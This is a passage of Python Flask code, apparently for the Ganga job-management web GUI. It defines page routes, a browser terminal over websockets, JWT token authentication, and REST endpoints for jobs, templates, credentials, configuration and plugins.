"offset": current_page
})
# Query templates information
templates_info = query_internal_api("/internal/templates", "get", params=params)
except Exception as err:
# Flash error if any
flash(str(err), "danger")
return redirect(url_for("create_page"))
return render_template("templates.html",
title="Templates",
number_of_pages=number_of_pages,
current_page=current_page,
backends=plugins["backends"],
applications=plugins["applications"],
templates_info=templates_info)
# Jobs view
@gui.route("/jobs", methods=["GET", "POST"])
@login_required
def jobs_page():
"""
Handles jobs route of the GUI. Displays jobs in a tabular view.
"""
# Update filter values
if request.method == "POST":
# Add form data to user session
session["jobs_per_page"] = int(request.form.get("jobs-per-page"))
session["jobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["job-status", "job-application", "job-backend"])}
# Current page
current_page = int(request.args.get("page")) if request.args.get("page") is not None else 0
# Get user defined value from user session
jobs_per_page = session["jobs_per_page"]
try:
# Query total number of jobs
jobs_length = query_internal_api("/internal/jobs/length", "get", params=session["jobs_filter"])
# Calculate number of max pages
number_of_pages = (int(jobs_length) // int(jobs_per_page)) + 1
# if current page exceeds last possible page, redirect to last page
if current_page >= number_of_pages:
return redirect(url_for("jobs_page", page=number_of_pages - 1))
# Add jobs filters and range options for query params
params = session["jobs_filter"].copy()
params.update({
"recent": True,
"length": jobs_per_page,
"offset": current_page
})
# Query jobs information
jobs_info = query_internal_api("/internal/jobs", "get", params=params)
except Exception as err:
# Display error back to GUI
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("jobs.html",
title="Jobs",
jobs_info=jobs_info,
backends=plugins["backends"],
applications=plugins["applications"],
number_of_pages=number_of_pages,
current_page=current_page,
status_color=status_color)
# Job view
@gui.route('/jobs/<int:job_id>')
@login_required
def job_page(job_id: int):
"""
Handles job route of the GUI. Displays all the information about the job.
:param job_id: int
"""
stdout = None
stderr = None
try:
# Query job information
job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
# Query full print of the job
full_print_info = query_internal_api(f"/internal/jobs/{job_id}/full-print", "get")
# stdout and stderr path
stdout_path = os.path.join(job_info["outputdir"], "stdout")
stderr_path = os.path.join(job_info["outputdir"], "stderr")
# Get stdout
if os.path.exists(stdout_path):
with open(stdout_path) as f:
stdout = f.read()
# Get stderr
if os.path.exists(stderr_path):
with open(stderr_path) as f:
stderr = f.read()
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("jobs_page"))
return render_template("job.html",
title=f"Job {job_id}",
job_info=job_info,
status_color=status_color,
attribute_actions=actions.get("attributes"),
method_actions=actions.get("methods"),
stdout=stdout,
stderr=stderr,
full_print_info=full_print_info)
# Export job
@gui.route("/jobs/<int:job_id>/export")
@login_required
def job_export(job_id: int):
"""
Sends the job file which is generated using export function of GPI.
:param job_id: int
"""
# Path to save file using export GPI function
export_path = os.path.join(gui.config["UPLOAD_FOLDER"], f"export.txt")
try:
# Query to export the job at export path
response_info = query_internal_api(f"/internal/jobs/{job_id}/export", "get", params={"path": export_path})
# Send file
return send_file(export_path, as_attachment=True, cache_timeout=0, attachment_filename=f"Job_{job_id}.txt")
except Exception as err:
# Display error back to GUI
flash(str(err), "danger")
return redirect(url_for("job_page", job_id=job_id))
# Edit job
@gui.route("/jobs/<int:job_id>/edit", methods=["GET", "POST"])
@login_required
def job_edit(job_id: int):
"""
Show the exported job text on the GUI for it to be edited and submit. Will create a new job after submission.
:param job_id: int
"""
# Save paths
loadfile_path = os.path.join(gui.config["UPLOAD_FOLDER"], "loadfile.txt")
export_path = os.path.join(gui.config["UPLOAD_FOLDER"], "export.txt")
# Create a new job with the submitted information
if request.method == "POST":
# Save the edited job info
edited_job_info = request.form.get("edited-job-info")
with open(loadfile_path, "w+") as f:
f.write(edited_job_info)
# Load the file
try:
# Query to load the job
response_info = query_internal_api("/internal/load", "get", params={"path": loadfile_path})
flash(response_info["message"], "success")
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(request.url)
try:
# Query to export the job text
response_info = query_internal_api(f"/internal/jobs/{job_id}/export", "get", params={"path": export_path})
# Read exported job file to display
with open(export_path) as f:
exported_data = f.read()
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("job_page", job_id=job_id))
return render_template("edit_job.html", title=f"Edit Job {job_id}", job_id=job_id, exported_data=exported_data)
# Browse job directory
@gui.route("/job/<int:job_id>/browse", defaults={"path": ""})
@gui.route("/job/<int:job_id>/browse/<path:path>")
@login_required
def job_browse(job_id: int, path):
"""
Browse directory of the job.
:param job_id: int
:param path: str
"""
try:
# Query job information
job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
# Base directory of the job
job_base_dir = os.path.dirname(os.path.dirname(job_info["outputdir"]))
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("job_page", job_id=job_id))
# Join the base and the requested path
abs_path = os.path.join(job_base_dir, path)
# URL path variable for going back
back_path = os.path.dirname(abs_path).replace(job_base_dir, "")
# If path doesn't exist
if not os.path.exists(abs_path):
flash("Directory for this job does not exist.", "warning")
return redirect(url_for("job_page", job_id=job_id))
# Check if path is a file and send
if os.path.isfile(abs_path):
return send_file(abs_path)
files_info = []
# Show directory contents
files = os.listdir(abs_path)
# Store directory information
for file in files:
files_info.append({
"file": file,
"directory": os.path.isdir(os.path.join(abs_path, file))
})
return render_template('job_dir.html', title=f"Job {job_id} Directory",
job_id=job_id,
abs_path=abs_path,
files_info=files_info,
back_path=back_path)
# Subjobs view
@gui.route("/jobs/<int:job_id>/subjobs", methods=["GET", "POST"])
@login_required
def subjobs_page(job_id: int):
"""
Handles subjobs view of the GUI. Displays subjobs of a job in a tabular form.
:param job_id: int
"""
# Change filter values
if request.method == "POST":
# Add form data to client session
session["subjobs_per_page"] = int(request.form.get("subjobs-per-page"))
session["subjobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["subjob-status", "subjob-application", "subjob-backend"])}
# Current page
current_page = int(request.args.get("page")) if request.args.get("page") is not None else 0
# Get user defined value from session
subjobs_per_page = session["subjobs_per_page"]
try:
# Query total number of subjobs
subjobs_length = query_internal_api(f"/internal/jobs/{job_id}/subjobs/length", "get",
params=session["subjobs_filter"])
# Calculate number of max pages
number_of_pages = (int(subjobs_length) // int(subjobs_per_page)) + 1
# if current page exceeds last possible page, redirect to last page
if current_page >= number_of_pages:
return redirect(url_for("subjobs_page", page=number_of_pages - 1, job_id=job_id))
# Add subjobs filters and range options for query params
params = session["subjobs_filter"].copy()
params.update({
"recent": True,
"length": subjobs_per_page,
"offset": current_page
})
# Query subjobs information
subjobs_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs", "get", params=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", job_id=job_id))
return render_template("subjobs.html",
title=f"Subjobs - Job {job_id}",
status_color=status_color,
number_of_pages=number_of_pages,
current_page=current_page,
backends=plugins["backends"],
applications=plugins["applications"],
subjobs_info=subjobs_info,
job_id=job_id)
# Subjob view
@gui.route("/jobs/<int:job_id>/subjobs/<int:subjob_id>", methods=["GET"])
@login_required
def subjob_page(job_id: int, subjob_id: int):
"""
Handles subjob route of the GUI. Displays extensive details of a subjob.
:param job_id: int
:param subjob_id: int
"""
stdout = None
stderr = None
try:
# Query job information
job_outputdir = query_internal_api(f"/internal/jobs/{job_id}/outputdir", "get")
# Query subjob information
subjob_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}", "get")
# Query full print of the job
full_print_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/full-print", "get")
# Extract browse path that can be used by job_browse route
job_dir_basepath = os.path.dirname(os.path.dirname(job_outputdir["outputdir"]))
subjob_dir_basepath = os.path.dirname(os.path.dirname(subjob_info["outputdir"]))
browse_path = subjob_dir_basepath.replace(job_dir_basepath, "")
# stdout and stderr path
stdout_path = os.path.join(subjob_info["outputdir"], "stdout")
stderr_path = os.path.join(subjob_info["outputdir"], "stderr")
# Get stdout
if os.path.exists(stdout_path):
with open(stdout_path) as f:
stdout = f.read()
# Get stderr
if os.path.exists(stderr_path):
with open(stderr_path) as f:
stderr = f.read()
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("subjobs_page", job_id=job_id))
return render_template("subjob.html",
title=f"Subjob {subjob_id} - Job {job_id}",
subjob_info=subjob_info,
status_color=status_color,
attribute_actions=actions["attributes"],
method_actions=actions["methods"],
stdout=stdout,
stderr=stderr,
full_print_info=full_print_info,
job_id=job_id,
browse_path=browse_path)
# Credential view
@gui.route("/credentials")
@login_required
def credentials_page():
"""
Handles credential store view of the GUI. Displays credentials in a tabular form.
"""
try:
# Query credential store information
credentials_info = query_internal_api("/internal/credentials", "get")
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('credentials.html', credential_info_list=credentials_info)
@gui.route("/queue", methods=["GET"])
@login_required
def queue_page():
"""
Displays queues information
"""
try:
queue_info = query_internal_api("/internal/queue", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('queue.html', queue_info_list=queue_info)
# Plugins view
@gui.route('/plugins')
@login_required
def plugins_page():
"""
Handles plugins route of the GUI. Displays the list of plugins.
"""
try:
# Store plugins information
plugins_info = plugins
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('plugins.html', plugins_info=plugins_info)
# Plugin view
@gui.route("/plugin/<plugin_name>")
@login_required
def plugin_page(plugin_name: str):
"""
Displays information about the plugin like it's docstring.
:param plugin_name: str
"""
try:
# Query plugin information
plugin_info = query_internal_api(f"/internal/plugins/{plugin_name}", "get")
except Exception as err:
# Display error on the GUI
flash(str(err), "danger")
return redirect(url_for("plugins_page"))
return render_template("plugin.html", title=f"{plugin_name}", plugin_info=plugin_info)
# Ganga logs view
@gui.route("/logs")
@login_required
def logs_page():
"""
Diplay ganga log file.
:return:
"""
ganga_log_path = gui.config["GANGA_LOG"]
gui_accesslog_path = gui.config["ACCESS_LOG"]
gui_errorlog_path = gui.config["ERROR_LOG"]
try:
# Get ganga log
with open(ganga_log_path, "rt") as f:
ganga_log_data = f.read()
# Get GUI access log
with open(gui_accesslog_path, "rt") as f:
gui_accesslog_data = f.read()
# Get GUI error log
with open(gui_errorlog_path, "rt") as f:
gui_errorlog_data = f.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("logs.html", title="Logs", ganga_log_data=ganga_log_data,
gui_accesslog_data=gui_accesslog_data, gui_errorlog_data=gui_errorlog_data)
@gui.route("/storage", defaults={"path": ""}, methods=["GET", "POST"])
@gui.route("/storage/<path:path>", methods=["GET", "POST"])
@login_required
def storage_page(path):
"""
A convenience feature to store some file remotely in gangadir/storage
"""
# Storage folder path
storage_folder = gui.config["STORAGE_FOLDER"]
# Join the storage path and the requested path
abs_path = os.path.join(storage_folder, path)
# Handle file uploads
if request.method == "POST":
# Uploaded file
if "storagefile" in request.files:
storagefile = request.files["storagefile"]
if storagefile.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
# If valid file, the save the file
if storagefile:
# Directory check
if not os.path.isdir(abs_path):
flash("Error while uploading the file", "danger")
return redirect(request.url)
filename = secure_filename(storagefile.filename)
save_path = os.path.join(abs_path, filename)
storagefile.save(save_path)
# Success message
flash("Successfully uploaded the file.", "success")
return redirect(request.url)
# No file case
flash("No file, retry!", "warning")
return redirect(request.url)
# URL path variable for going back
back_path = os.path.dirname(abs_path).replace(storage_folder, "")
# If path doesn't exist
if not os.path.exists(abs_path):
flash("Directory does not exist.", "warning")
return redirect(url_for("dashboard"))
# Check if path is a file and send
if os.path.isfile(abs_path):
return send_file(abs_path)
files_info = []
# Show directory contents
files = os.listdir(abs_path)
# Store directory information
for file in files:
files_info.append({
"file": file,
"directory": os.path.isdir(os.path.join(abs_path, file))
})
return render_template("storage.html", title="Storage",
abs_path=abs_path,
files_info=files_info,
back_path=back_path)
# Serve CLI
@gui.route("/cli")
@login_required
def serve_cli():
return render_template("cli.html")
# Establish a websocket connection from the frontend to the server
@socketio.on("connect", namespace="/pty")
def connect():
"""
New client connected, start reading and writing from the pseudo terminal.
"""
if gui.config["CHILD_PID"] and current_user.is_authenticated:
# Start background reading and emitting the output of the pseudo terminal
socketio.start_background_task(target=read_and_forward_pty_output)
return
# Input from the frontend
@socketio.on("pty-input", namespace="/pty")
def pty_input(data):
"""
Write to the child pty. The pty sees this as if you are typing in a real terminal.
"""
if gui.config["FD"] and current_user.is_authenticated:
os.write(gui.config["FD"], data["input"].encode())
# Resize the pseudo terminal when the frontend is resized
@socketio.on("resize", namespace="/pty")
def resize(data):
"""
Resize the pseudo terminal according to the dimension at the frontend.
:param data: contains information about rows and cols of the frontend terminal.
"""
if gui.config["FD"] and current_user.is_authenticated:
set_windowsize(gui.config["FD"], data["rows"], data["cols"])
# ******************** Token Based Authentication ******************** #
# Generate token for API authentication - token validity 5 days
@gui.route("/token", methods=["POST"])
def generate_token():
"""
Using the 'user' and 'password' data from the form body, validates the user and returns a JSON Web Token (JWT).
"""
# Request form data
request_json = request.json if request.json else {}
request_user = request_json.get("username")
request_password = request_json.get("password")
# Handle no user or no password case
if not request_user or not request_password:
response_data = {"success": False, "message": "Could not verify user."}
return jsonify(response_data), 401
# Verify user and accordingly return the token
user = User.query.filter_by(user=request_user).first()
if user and user.verify_password(request_password):
token = user.generate_auth_token().decode("UTF-8")
response_data = {"token": token}
return jsonify(response_data)
# If authentication fails, return 401 HTTP code
response_data = {"success": False, "message": "Could not verify user."}
return jsonify(response_data), 401
# ******************** Token Authentication Decorator ******************** #
# Decorator for token protected routes
def token_required(f):
"""
Decorator which validates the request header token in 'X-Acess-Token' field, and returns the user.
"""
@wraps(f)
def decorated(*args, **kwargs):
token = None
# Extract token from headers
if "X-Access-Token" in request.headers:
token = request.headers["X-Access-Token"]
if not token:
return jsonify({"success": False, "message": "Token is missing"}), 401
# Decode the token and subsequently identify the user
try:
data = jwt.decode(token, gui.config["SECRET_KEY"], algorithms=["HS256"])
current_api_user = User.query.filter_by(public_id=data["public_id"]).first()
if current_api_user is None:
return jsonify({"success": False, "message": "Token is old. Please renew"}), 401
except jwt.ExpiredSignatureError:
return jsonify({"success": False, "message": "Token is expired"}), 401
except jwt.InvalidTokenError:
return jsonify({"success": False, "message": "Token is invalid"}), 401
except:
return jsonify({"success": False, "message": "Could not verify token"}), 401
return f(current_api_user, *args, **kwargs)
return decorated
# ******************** Job API ******************** #
# Single job information API - GET Method
@gui.route("/api/jobs/<int:job_id>", methods=["GET"])
@token_required
def job_endpoint(current_api_user, job_id: int):
"""
Given the job_id, returns the general information related to the job in JSON format.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query job information to the GPI
job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(job_info)
# Single job attribute information API - GET Method
@gui.route("/api/jobs/<int:job_id>/<attribute>", methods=["GET"])
@token_required
def job_attribute_endpoint(current_api_user, job_id: int, attribute: str):
"""
Given the job_id and attribute, returns the attribute information in the JSON format.
:param job_id: int
:param attribute: str
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query job attribute information from ganga
job_attribute_info = query_internal_api(f"/internal/jobs/{job_id}/{attribute}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(job_attribute_info)
# Single job full print API - GET Method
@gui.route("/api/jobs/<int:job_id>/full-print", methods=["GET"])
@token_required
def job_full_print_endpoint(current_api_user, job_id: int):
"""
Return full print of the job.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query job full print from ganga
full_print_info = query_internal_api(f"/internal/jobs/{job_id}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(full_print_info)
# Create job using template API - POST Method
@gui.route("/api/jobs/create", methods=["POST"])
@token_required
def job_create_endpoint(current_api_user):
"""
Create a new job using the existing template.
IMPORTANT: template_id NEEDS to be provided in the request body. job_name can optionally be provided in the request body.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
# Request data
data = {
"template_id": request.json.get("template_id"),
"job_name": request.json.get("job_name")
}
try:
# Query ganga to create a job using the template id
response_info = query_internal_api("/internal/jobs/create", "post", json=data)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# Copy job API - PUT Method
@gui.route("/api/jobs/<int:job_id>/copy", methods=["PUT"])
@token_required
def job_copy_endpoint(current_api_user, job_id: int):
"""
Create a copy of the job.
:param current_api_user: Information of the current_api_user based on the request's JWT token
:param job_id: int
"""
try:
# Query ganga to copy the job
response_info = query_internal_api(f"/internal/jobs/{job_id}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# Job action API - PUT Method
@gui.route("/api/jobs/<int:job_id>/<action>", methods=["PUT"])
@token_required
def job_action_endpoint(current_api_user, job_id: int, action: str):
"""
Given the job_id and action in the endpoint, perform the action on the job.
The action can be any method or attribute change that can be called on the Job object.
Example:
1)
PUT http://localhost:5000/job/13/resubmit
The above request will resubmit the job with ID 13.
2)
PUT http://localhost:5000/job/13/force_status
{"force_status":"failed"}
The above request will force status of the job with ID 13 to killed. If unsuccessful will return back the error.
3)
PUT http://localhost:5000/job/13/name
{"name"="New Name"}
The above request will change the name of the job with ID 13 to "New Name". Notice how the required values
are passed in the request body with the same name as action.
NOTE: It is NECESSARY to send body in JSON format for the request to be parsed in JSON.
:param job_id: int
:param action: str
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
# Request data
request_data = request.json
try:
# Query ganga to perform the action
response_info = query_internal_api(f"/internal/jobs/{job_id}/{action}", "put", json=request_data)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# Job delete API - DELETE Method
@gui.route("/api/jobs/<int:job_id>", methods=["DELETE"])
@token_required
def job_delete_endpoint(current_api_user, job_id: int):
"""
Given the job id, removes the job from the job repository.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to delete the job
response_info = query_internal_api(f"/internal/jobs/{job_id}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# Pin the Job
@gui.route("/api/jobs/<int:job_id>/pin", methods=["PUT"])
@token_required
def job_pin_endpoint(current_api_user, job_id: int):
"""
Pin the given job, which is then shown in the dashboard.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
# Get current user
u = current_user
# Load pinned jobs of the user from the database
pinned_jobs = json.loads(u.pinned_jobs) if u.pinned_jobs is not None else []
# Pin job
if job_id not in pinned_jobs:
pinned_jobs.append(job_id)
# Add new pinned jobs to the database
u.pinned_jobs = json.dumps(pinned_jobs)
db.session.add(u)
db.session.commit()
return jsonify({"success": True, "message": f"Successfully pinned Job (ID={job_id})."})
# Unpin the job
@gui.route("/api/jobs/<int:job_id>/unpin", methods=["PUT"])
@token_required
def job_unpin_endpoint(current_api_user, job_id: int):
"""
Unpin the job, and make the required change to the GUI database.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
# Get the user from the database
u = current_user
# Load user's pinned job from the database
pinned_jobs = json.loads(u.pinned_jobs) if u.pinned_jobs is not None else []
# Unpin the job
if job_id in pinned_jobs:
pinned_jobs.remove(job_id)
# Commit changes to the database
u.pinned_jobs = json.dumps(pinned_jobs)
db.session.add(u)
db.session.commit()
return jsonify({"success": True, "message": f"Successfully unpinned Job (ID={job_id})."})
# ******************** Subjobs API ******************** #
# Subjobs API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs", methods=["GET"])
@token_required
def subjobs_endpoint(current_api_user, job_id: int):
"""
Returns a list subjobs of a particular job in a similar way as Jobs API.
The parameter accepted are:
* ids: provide a JSON string of list of IDs
* status: provide subjob status as a string for filter
* application: provide subjob application as a string for filter
* backend: provide backend application as a string for filter
* recent: if provided, starts a list from recent subjobs to old
* length: number of subjobs to be returned, provide as a int
* offset: how many subjobs to skip before returning the specified length of subjobs. Provide as int.
offset works as: number of subjobs skipped = offset * length
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
params = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset")
}
try:
# Query ganga for subjobs information
subjobs_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs", "get", params=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(subjobs_info)
# Single subjob info API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>", methods=["GET"])
@token_required
def subjob_endpoint(current_api_user, job_id: int, subjob_id: int):
"""
Returns information of a single subjob related to a particular job
:param job_id: int
:param subjob_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query subjob information to ganga
subjob_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(subjob_info)
# Single Subjob Attribute Info API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/<attribute>", methods=["GET"])
@token_required
def subjob_attribute_endpoint(current_api_user, job_id: int, subjob_id: int, attribute: str):
"""
Given the job id, subjob id and attribute; return the attribute information in the string format via JSON.
:param job_id: int
:param subjob_id: int
:param attribute: str
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query attribute information from ganga
subjob_attribute_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/{attribute}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(subjob_attribute_info)
# Single subjob full print API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/full-print", methods=["GET"])
@token_required
def subjob_full_print_endpoint(current_api_user, job_id: int, subjob_id: int):
"""
Return full print of the subjob.
:param subjob_id: int
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query subjob full print from ganga
full_print_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(full_print_info)
# Copy subjob API - PUT Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/copy", methods=["PUT"])
@token_required
def subjob_copy_endpoint(current_api_user, job_id: int, subjob_id: int):
"""
Create a copy of the subjob into a new job.
:param job_id:
:param subjob_id:
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to copy subjob
response_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# ******************** Jobs API ******************** #
# Jobs API - GET Method
@gui.route("/api/jobs", methods=["GET"])
@token_required
def jobs_endpoint(current_api_user):
"""
Returns a list of jobs with general information in JSON format.
The parameter accepted are:
* ids: provide a JSON string of list of IDs
* status: provide job status as a string for filter
* application: provide job application as a string for filter
* backend: provide backend application as a string for filter
* recent: if provided, starts a list from recent job to old
* length: number of job to be returned, provide as a int
* offset: how many job to skip before returning the specified length of job. Provide as int.
offset works like: number of job skipped = offset * length
* auto-validate-ids: If ids provided in ids parameters does not exist in job repository, then skip those ids.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
params = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
"auto-validate-ids": request.args.get("auto-validate-ids")
}
try:
# Get jobs information according to select filter and range filter
jobs_info = query_internal_api(f"/internal/jobs", "get", params=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(jobs_info)
# Jobs statistics API - GET Method
@gui.route("/api/jobs/statistics", methods=["GET"])
@token_required
def jobs_statistics_endpoint(current_api_user):
"""
Returns the number of jobs in new, running, completed, killed, failed status.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get statistics information
statistics = query_internal_api("/internal/jobs/statistics", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(statistics)
@gui.route("/api/queue", methods=["GET"])
@token_required
def queue_endpoint(current_api_user):
try:
queue_info = query_internal_api("/internal/queue", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(queue_info)
@gui.route("/api/queue/chart", methods=["GET","POST"])
def queue_chart_endpoint():
chart_info = query_internal_api("/internal/queue/data", "get")
response = make_response(json.dumps(chart_info))
response.content_type = 'application/json'
return response
# Job incomplete ids API - GET Method
@gui.route("/api/jobs/incomplete_ids", methods=["GET"])
@token_required
def jobs_incomplete_ids_endpoint(current_api_user):
"""
Returns a list of incomplete job ids in JSON format.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get incomplete ids list
incomplete_ids_list = query_internal_api("/internal/jobs/incomplete-ids", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(incomplete_ids_list)
# ******************** Config API ******************** #
# Config API - GET Method
@gui.route("/api/config", methods=["GET"], defaults={"section": ""})
@gui.route("/api/config/<section>", methods=["GET"])
@token_required
def config_endpoint(current_api_user, section: str):
"""
Returns a list of all the section of the configuration and their options as well as the values in JSON format.
If section is provide, returns information about the section in JSON format.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get config information
if section != "":
config_info = query_internal_api(f"/internal/config/{section}", "get")
else:
config_info = query_internal_api("/internal/config", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(config_info)
# ******************** Templates API ******************** #
# Templates API - GET Method
@gui.route("/api/templates", methods=["GET"])
@token_required
def templates_endpoint(current_api_user):
"""
Returns a list of objects containing template info in JSON format.
* ids: provide a JSON string of list of IDs
* status: provide template status as a string for filter
* application: provide template application as a string for filter
* backend: provide backend application as a string for filter
* recent: if provided, starts a list from recent template to old
* length: number of template to be returned, provide as a int
* offset: how many template to skip before returning the specified length of template. Provide as int.
offset works like: number of template skipped = offset * length
:param current_api_user: Information of the current_user based on the request's JWT token
"""
params = {
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
}
try:
# Query ganga for templates information
templates_info = query_internal_api("/internal/templates", "get", params=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(templates_info)
# Single template full print API - GET Method
@gui.route("/api/templates/<int:template_id>/full-print", methods=["GET"])
@token_required
def template_full_print_endpoint(current_api_user, template_id: int):
"""
Return full print of the template.
:param template_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query template full print from ganga
full_print_info = query_internal_api(f"/internal/templates/{template_id}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(full_print_info)
# Template API - DELETE Method
@gui.route("/api/templates/<int:template_id>", methods=["DELETE"])
@token_required
def delete_template_endpoint(current_api_user, template_id: int):
"""
Given the templates id, delete it from the template repository.
:param template_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to remove the template
response_info = query_internal_api(f"/internal/templates/{template_id}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# ******************** Credentials API ******************** #
# Credential store API - GET Method
@gui.route("/api/credentials", methods=["GET"])
@token_required
def credentials_endpoint(current_api_user):
"""
Return a list of credentials and their information in JSON format.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga for credentials information
credentials_info = query_internal_api("/internal/credentials", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(credentials_info)
# Credential Store API - PUT Method - Renew all credentials
@gui.route("/api/credentials/renew", methods=["PUT"])
@token_required
def credentials_renew_endpoint(current_api_user):
"""
Renew all the credentials in the credential store.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to renew credentials
response_info = query_internal_api("/internal/credentials/renew", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# ******************** Job Tree API ******************** #
# Job tree API - GET Method
@gui.route("/api/jobtree", methods=["GET"])
@token_required
def jobtree_endpoint(current_api_user):
"""
Return the job tree folder structure as the json format of python dict.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get job tree information
jobtree_info = query_internal_api("/internal/jobtree", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(jobtree_info)
# ******************** Job Tree API ******************** #
# Plugins API - GET Method
@gui.route("/api/plugins", methods=["GET"])
@token_required
def plugins_endpoint(current_api_user):
"""
Return plugins information, category and names of the plugins in the category.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get plugins information
plugins_info = query_internal_api("/internal/plugins", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(plugins_info)
# Plugin API - GET Method
@gui.route("/api/plugins/<plugin_name>", methods=["GET"])
@token_required
def plugin_endpoint(current_api_user, plugin_name: str):
"""
Return single plugin information like name and docstring.
:param plugin_name: str
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get plugin information
plugin_info = query_internal_api(f"/internal/plugins/{plugin_name}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(plugin_info)
